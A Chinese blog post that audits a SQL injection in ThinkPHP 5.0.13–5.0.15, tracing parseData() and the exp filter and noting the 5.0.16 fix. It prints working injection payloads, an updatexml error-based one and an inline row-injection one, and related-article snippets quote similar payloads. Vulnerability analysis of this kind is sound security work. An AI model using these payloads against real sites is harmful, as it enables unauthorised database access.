Thinkphp5.0.15 SQL注入

最新推荐文章于 2024-04-27 15:40:54 发布
最新推荐文章于 2024-04-27 15:40:54 发布
阅读量1.7k 收藏 2
点赞数 1
分类专栏: 代码审计 CMS和框架 SQL注入 文章标签: php Thinkphp SQL注入 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/rfrder/article/details/114376727
版权

前言

刚把tp5的RCE给审的差不多了,审的很爽,接下来审一下thinkphp5各个版本的SQL注入。
在这里插入图片描述
这里先开始审parseData方法造成的SQL注入,然后接下来几篇文章按照这个顺序来依次审计。
代码不用说了,composer先下载下来。

composer create-project  topthink/think=5.0.15 thinkphp5.0.15

下载来的%99都是版本不对,改一下composer.json
在这里插入图片描述
然后composer update就可以了。
index控制器那里写一下insert语句:

class Index
{
    public function index()
    {
        $username = request()->get('username/a');//以数组的格式获取$_GET中的username变量,然后作为参数传入insert()
        db('users')->insert(['username' => $username,'password'=>'testpasswd']);
        return 'Update success';
    }
}

比较懒,数据库还是用sqli-labs的那个users库。
在application/database.php那里设置一下数据库:
在这里插入图片描述

开启 application/config.php 中的 app_debug 和 app_trace 。开启app_debug才可以看到报错注入的注入语句。
parseData()方法的注入,漏洞影响版本: 5.0.13<=ThinkPHP<=5.0.15 、 5.1.0<=ThinkPHP<=5.1.5 。

分析

这里涉及的是insert注入,一开始可能会不理解为什么$username的获取那里要get(‘username/a’),转为数组,而不是直接获取字符串,那先把/a给去掉,传?username=adb,直接获取字符串,来看一下这一路上的代码逻辑。
在这里插入图片描述
跟进insert()方法,parseExpress()方法执行后,产生了这样的$option在这里插入图片描述
相当于只是获得一下查询的表名称。再跟进$this->builder->insert,这个生成SQL语句的函数:
在这里插入图片描述
有问题的函数就是这个parseData,不过这里先不分析。这里不打断点继续执行,产生的$data是这样:
在这里插入图片描述
产生了预编译参数。然后这里产生关键的SQL语句,就相当于直接替换了,替换后的结果是这样。
在这里插入图片描述

INSERT INTO `users` (`username` , `password`) VALUES (:data__username , :data__password)

继续跟进,进入execute执行函数:
在这里插入图片描述
在这里插入图片描述
关键的就是这几句代码,对$sql,那个SQL语句进行prepare,然后bindParam(),进行一下参数绑定,然后执行语句,最终相当于一开始预编译语句是这个,然后绑定参数进行执行。:

INSERT INTO `users` (`username` , `password`) VALUES (:data__username , :data__password) 
INSERT INTO `users` (`username` , `password`) VALUES ("abc" , "testpasswd")

结果也很明显了,肯定没法进行SQL注入,因为最后用了预编译,即使之前的那个SQL语句的产生是直接的替换,也无法实现注入。

再来看一下那个出了问题的parseData()函数:

/**
 * 数据分析
 * @access protected
 * @param array     $data 数据
 * @param array     $options 查询参数
 * @return array
 * @throws Exception
 */
protected function parseData($data, $options)
{
    if (empty($data)) {
        return [];
    }

    // 获取绑定信息
    $bind = $this->query->getFieldsBind($options['table']);
    if ('*' == $options['field']) {
        $fields = array_keys($bind);
    } else {
        $fields = $options['field'];
    }

    $result = [];
    foreach ($data as $key => $val) {
        $item = $this->parseKey($key, $options);
        if (is_object($val) && method_exists($val, '__toString')) {
            // 对象数据写入
            $val = $val->__toString();
        }
        if (false === strpos($key, '.') && !in_array($key, $fields, true)) {
            if ($options['strict']) {
                throw new Exception('fields not exists:[' . $key . ']');
            }
        } elseif (is_null($val)) {
            $result[$item] = 'NULL';
        } elseif (is_array($val) && !empty($val)) {
            switch ($val[0]) {
                case 'exp':
                    $result[$item] = $val[1];
                    break;
                case 'inc':
                    $result[$item] = $this->parseKey($val[1]) . '+' . floatval($val[2]);
                    break;
                case 'dec':
                    $result[$item] = $this->parseKey($val[1]) . '-' . floatval($val[2]);
                    break;
            }
        } elseif (is_scalar($val)) {
            // 过滤非标量数据
            if (0 === strpos($val, ':') && $this->query->isBind(substr($val, 1))) {
                $result[$item] = $val;
            } else {
                $key = str_replace('.', '_', $key);
                $this->query->bind('data__' . $key, $val, isset($bind[$key]) ? $bind[$key] : PDO::PARAM_STR);
                $result[$item] = ':data__' . $key;
            }
        }
    }
    return $result;
}

产生预编译的那些是因为进入了这个if:

} elseif (is_scalar($val)) {
    // 过滤非标量数据
    if (0 === strpos($val, ':') && $this->query->isBind(substr($val, 1))) {
        $result[$item] = $val;
    } else {
        $key = str_replace('.', '_', $key);
        $this->query->bind('data__' . $key, $val, isset($bind[$key]) ? $bind[$key] : PDO::PARAM_STR);
        $result[$item] = ':data__' . $key;
    }
}

产生了:data_username:data_password的预处理。
但是如果$val是数组呢?get()方法那里改成username/a,会进入这个:

} elseif (is_array($val) && !empty($val)) {
    switch ($val[0]) {
        case 'exp':
            $result[$item] = $val[1];
            break;
        case 'inc':
            $result[$item] = $this->parseKey($val[1]) . '+' . floatval($val[2]);
            break;
        case 'dec':
            $result[$item] = $this->parseKey($val[1]) . '-' . floatval($val[2]);
            break;
    }
}

如果$val[0]是exp,inc,或者dec的话username的那一部分就不会产生预编译了,而是直接字符串,然后替换进入SQL语句中,不过exp不能用,因为
在这里插入图片描述
get方法会对exp进行过滤,使"exp"变成"exp "。跟进一下get,先获得$_GET,然后进入input:
在这里插入图片描述
再进入filterValue():
在这里插入图片描述
在filterValue方法中因为没用可回调的filter,所以最终调用这个:
在这里插入图片描述
进行了过滤,所以EXP不行。

public function filterExp(&$value)
{
    // 过滤查询特殊字符
    if (is_string($value) && preg_match('/^(EXP|NEQ|GT|EGT|LT|ELT|OR|XOR|LIKE|NOTLIKE|NOT LIKE|NOT BETWEEN|NOTBETWEEN|BETWEEN|NOTIN|NOT IN|IN)$/i', $value)) {
        $value .= ' ';
    }
    // TODO 其他安全过滤
}

但是inc和dec都可以。payload如下:

?username[0]=inc&username[1]=updatexml(1,concat(0x7e,database(),0x7e),1)&username[2]=1

产生的SQL语句是这样:

INSERT INTO `users` (`username` , `password`) VALUES (updatexml(1,concat(0x7e,database(),0x7e),1)+1 , :data__password)

SQL语句并不是预编译,而是直接插入,实现了SQL注入。不过这只是报错注入,如果没开启报错,而且有回显的点的话,就可以这样:

?username[0]=inc&username[1]=database(),database()),("123"&username[2]=1

执行的SQL语句是这样:

INSERT INTO `users` (`username` , `password`) VALUES (database(),database()),("123"+1 , 'testpasswd')

放一下七月火师傅的总结图:
在这里插入图片描述

修复

去github上看一下thinkphp5.0.16的更新信息:
在这里插入图片描述
在这里插入图片描述
看一下这个改进的inc/dec查询:
在这里插入图片描述

bfengj
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
ThinkPHP5.0.15_parseData造成SQL注入漏洞分析
11-28 1144
ThinkPHP5.0.15_parseData造成SQL注入漏洞分析 ThinkPHP5.0.13-ThinkPHP5.0.15/ThinkPHP5.1.0-ThinkPHP5.1.5 漏洞代码<?php namespace app\index\controller; class Index{ public function index(){ $username = request()->get('username\a'); db('users')-
PHP SQL注入
qpmglj的专栏
04-23 654
什么是SQL注入SQL注入是一种将SQL代码添加到输入参数中,传递给SQL服务器解析并执行的攻击手段。上个简单案例:这是正常mysql数据库查询语句,下面展示SQL注入的案例:select * from dept where deptno = -1 or 1 =1;这就是所谓的将SQL代码添加到输入参数中,传递给SQL服务器解析并执行,这样就可以得知你的数据库信息。攻击者可以通过SQL代码构造,达...
ThinkPHP v5.0.15 完整版
02-06
软件介绍 ThinkPHP是一个免费开源的,快速、简单的面向对象的轻量级PHP开发框架,遵循Apache2开源协议发布,是为了敏捷WEB应用 开发和简化企业级应用开发而诞生的。拥有众多的优秀功能和特性,经历了三年多发展的同时,在社区团队的积极参与下,在易用性、扩展性和性能方面不断优化和 改进,众多的典型案例确保可以稳定用于商业以及门户级的开发。 ThinkPHP借鉴了国外很多优秀的框架和模式,使用面向对象的开发结构和MVC模式,采用单一入口模式等,融合了Struts的 Action思想和JSP的TagLib(标签库)、RoR的ORM映射和ActiveRecord模式,封装了CURD和一些常用操作,在项目配置、类 库导入、模版引擎、查询语言、自动验证、视图模型、项目编译、缓存机制、SEO支持、分布式数据库、多数据库连接和切换、认证机制和扩展性方面均有独特的 表现。 使用ThinkPHP,你可以更方便和快捷的开发和部署应用。当然不仅仅是企业级应用,任何PHP应用开发都可以从ThinkPHP的简单 和快速的特性中受益。ThinkPHP本身具有很多的原创特性,并且倡导大道至简,开发由我的开发理念,用最少的代码完成更多的功能,宗旨就是让WEB应 用开发更简单、更快速。为此ThinkPHP会不断吸收和融入更好的技术以保证其新鲜和活力,提供WEB应用开发的最佳实践! ThinkPHP遵循Apache2开源许可协议发布,意味着你可以免费使用ThinkPHP,甚至允许把你基于ThinkPHP开发的应用开源或商业产 品发布/销售。 ThinkPHP v5.0.15 更新日志: 改进View类 改进chunk方法 改进模板引擎的表达式语法 改进自关联查询多级调用问题 关联定义增加`selfRelation`方法用于设置是否自关联 改进file类型的缓存`inc`和`dec`方法不改变缓存有效期 改进软删除 支持设置`deleteTime`属性关闭 改进`union`查询 改进查询缓存 优化File缓存自动生成空目录的问题 改进日志写入并发问题 修正`MorphTo`关联 改进`join`自关联查询 改进`case`标签解析 改进Url类对`url_convert`配置的支持
ThinkPHP5 SQL注入漏洞&&敏感信息泄露漏洞
最新发布
weixin_45653478的博客
04-27 716
ThinkPHP是在中国使用极为广泛的PHP开发框架。在其版本5.0(<5.1.23)中,开启debug模式,传入的某参数在绑定编译指令的时候又没有安全处理,预编译的时候导致SQL异常报错。然而thinkphp5默认开启debug模式,在漏洞环境下构造错误的SQL语法会泄漏数据库账户和密码。
12-PHP代码审计——ThinkPHP5.0.15 update注入分析
网络安全
05-06 782
环境: thinkphp_5.0.15_full poc: level[0]=inc&level[1]=updatexml(1,concat(0x7,user(),0x7e),1)&level[2]=1 下载ThinkPHP5.0.15解压到www.tptest.com目录下,并在phpstudy中将域名站点的网站目录改为ThinkPHP5.0.15的public目录。 在application目录的config.php文件中开启跟踪调试模式,如下所示: // 应.
ThinkPHPSQL注入问题
hldfight
11-22 5958
ThinkPHP常见SQL注入问题0x00 前言0x01 where()方法 + exp表达式1.1 漏洞代码1.2 漏洞利用1.3 漏洞原理1.4 漏洞修复0x02 数据查询方法参数可控导致可拼接操作符2.1 漏洞代码2.2 漏洞利用2.3 漏洞原理2.4 漏洞修复0x03 where()方法 + bind表达式 + save()方法3.1 漏洞代码3.2 漏洞利用3.3 漏洞原理3.4 漏洞修复0x04 order()方法4.1 漏洞代码4.2 漏洞利用4.3 漏洞原理4.4 漏洞修复0x05 参考文章
ThinkPHP5.0.15代码审计【SQL注入
D.MIND 的博客
05-04 446
文章目录环境搭建分析payload:修复 环境搭建 到composer.json填写版本 到application/index/controller/Index.php中配置: public function index()//控制方法 { $username = request()->get('username/a'); db('users')->insert(['username'=>$username]); return 'Update success'; }
对于ThinkPHP框架早期版本的一个SQL注入漏洞详细分析
10-25
主要介绍了对于ThinkPHP框架早期版本的一个SQL注入漏洞详细分析,对于网站安全十分重要!需要的朋友可以参考下
ThinkPHP 开发框架 v5.0.15 完整版
11-07
《深入理解ThinkPHP 5.0.15:构建高效Web应用的基石》 ThinkPHP,作为国内广泛应用的PHP开发框架,以其强大的功能和简洁的语法赢得了开发者们的喜爱。ThinkPHP 5.0.15版本是其发展过程中的一个重要里程碑,它在保持...
ThinkPHP 开发框架 v5.0.15 核心版
11-25
ThinkPHP 5.0.15核心版:构建高效Web应用的基石》 ThinkPHP,作为一款广受赞誉的开源PHP开发框架,以其简洁、快速、面向对象的设计理念,为开发者提供了强大的工具箱,助力敏捷Web应用和企业级项目的开发。在v...
thinkphp_5.0.15_full.zip
08-26
标题“thinkphp_5.0.15_full.zip”指的是ThinkPHP框架的5.0.15完整版本的压缩包。这个版本是针对PHP开发者的,提供了完整的框架结构和功能,便于快速构建Web应用程序。 描述中提到的关键点是关于URL重写规则。在...
13-PHP代码审计——ThinkPHP5.0.15聚合查询漏洞分析
网络安全
05-06 585
漏洞环境: ThinkPHP5.0.15 <= 漏洞影响版本 poc: id),(select sleep(5)),(username id),(updatexml(1,concat(0x7,database(),0x7e),1) 什么是聚合查询? mysql数据库中有一张users表用于存储用户信息,假如我们想要查询users表中有多少个用户的记录,可以直接执行select * from users sql语句来获取用户的个数记录,但是这样做的效率非常低,因为我们只想..
thinkphp】TP5的依赖注入/容器/门面的最基础概念和用法
cherry_boat的博客
10-28 2073
o(* ̄▽ ̄*)ブ
分析ThinkPHP5的源码(1) : 类的自动加载
黎明强的博客
10-15 1680
Composer 下载的源码,每个框架它都必须都有一个“类的自动加载”机制 ,我们都知道PHP引入文件是需要 、 才能使用别的类文件中的方法。比如我需要写一个公共文件 model.php 但是!如何当公共类库文件很多的时候,每次都需要手动引入,就显得非常麻烦,不利于/不方便维护管理。 所以PHP引入了一个 的类自动加载,TP框架就是借助了 来完成类的自动加载。学习框架源码的第一步,先找到入口文件 ,然后一步步跟进流程,看下代码执行的过程。 打开Base.php ,第16行就会去加载 文件 (就是
ThinkPHP5漏洞分析之SQL注入(七)
Jeromeyoung
01-06 1879
返回到了$instance变量中,这时控制器这块已经基本上处理完了,think\App实际上就是thinkphp\library\think\App.php这个php文件里的App类(在MVC架构中,某些类也是可以叫做控制器),think是一个命名空间。命名空间的概念百度一下就知道了。相信很多人在不懂原理的情况下,看这一串payload是感觉很nb的一个paylaod(因为它长,需要的参数多),像我本人之前就纳闷这payload中为啥还会有反斜杠,s参数名是啥?接下来就是获取方法,调用反射执行类的方法。
thinkphp 框架原理之依赖注入和控制反转、容器
weixin_46742102的博客
05-05 1741
依赖注入和控制反转 在框架的底层设计中,需要很多类的协同工作,如果这些类之间依赖性很强,会出现许多的副作用。软件工程提倡的是高内聚,低耦合,为了降低类的耦合性,控制反转(IoC)是一种有效的设计原则,而依赖注入是控制反转的一种实现方式。 依赖注入例子: <?php /** * Created by PhpStorm. * User: 10475 * Date: 2018/8/27 * Time: 22:59 */ namespace app\demo\controller; use thin
学习笔记-ThinkPHP5漏洞分析之SQL注入(四)
人饭子的博客
11-09 1094
ThinkPHP5漏洞分析之SQL注入(四) 本次漏洞存在于所有 Mysql 聚合函数相关方法。由于程序没有对数据进行很好的过滤,直接将数据拼接进 SQL 语句,最终导致 SQL注入漏洞 的产生。漏洞影响版本: 5.0.0<=ThinkPHP<=5.0.21 、 5.1.3<=ThinkPHP5<=5.1.25 。 不同版本 payload 需稍作调整: 5.0.0~5...
ThinkPHP5.0.x框架SQL注入
热门推荐
An丶的博客
06-05 1万+
漏洞简述尽管ThinkPHP 5.0.x框架采用了参数化查询方式,来操作数据库,但是在 insert 和 update 方法中,传入的参数可控,且无严格过滤,最终导致本次SQL注入漏洞发生。ThinkPHP基础知识在进行漏洞分析之前,我们需要了解一下ThinkPHP基础知识,这里仅介绍对本次漏洞分析有帮助的部分。ThinkPHP5.0的 目录结构thinkphp 应用部署目录├─applicati...
一次复现审计ThinkPHP5.0.15版本的sql注入
p_utao的博客
01-22 306
关于tp框架 ThinkPHP 是一个免费开源的,快速、简单的面向对象的 轻量级PHP开发框架 ,创立于2006年初,遵循Apache2开源协议发布,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。并且拥有众多的原创功能和特性,在社区团队的积极参与下,在易用性、扩展性和性能方面不断优化和改进,已经成长为国内最领先和最具影响力的WEB应用开发框架,众多的典型案例确保可以稳定用于商业以及门户级的开发。
thinkphp防止sql注入例子
06-03
为了防止SQL注入攻击,ThinkPHP提供了多种方法,例如参数绑定、数据类型检测、预处理语句等。下面是一个使用参数绑定的例子: ``` $username = input('post.username'); $password = input('post.password'); $user = Db::query('select * from users where username = ? and password = ?', [$username, $password]); if ($user) { // 登录成功 } else { // 登录失败 } ``` 上面的代码中,`$username`和`$password`是从`POST`请求中获取的,然后使用参数绑定的方式将它们绑定到SQL语句中,这样可以避免SQL注入攻击。另外,还可以使用`Db::execute`方法来执行预处理语句,例如: ``` $username = input('post.username'); $password = input('post.password'); $sth = Db::execute('select * from users where username = ? and password = ?', [$username, $password]); if ($sth->rowCount()) { // 登录成功 } else { // 登录失败 } ``` 预处理语句会在执行前进行编译,可以有效地防止SQL注入攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值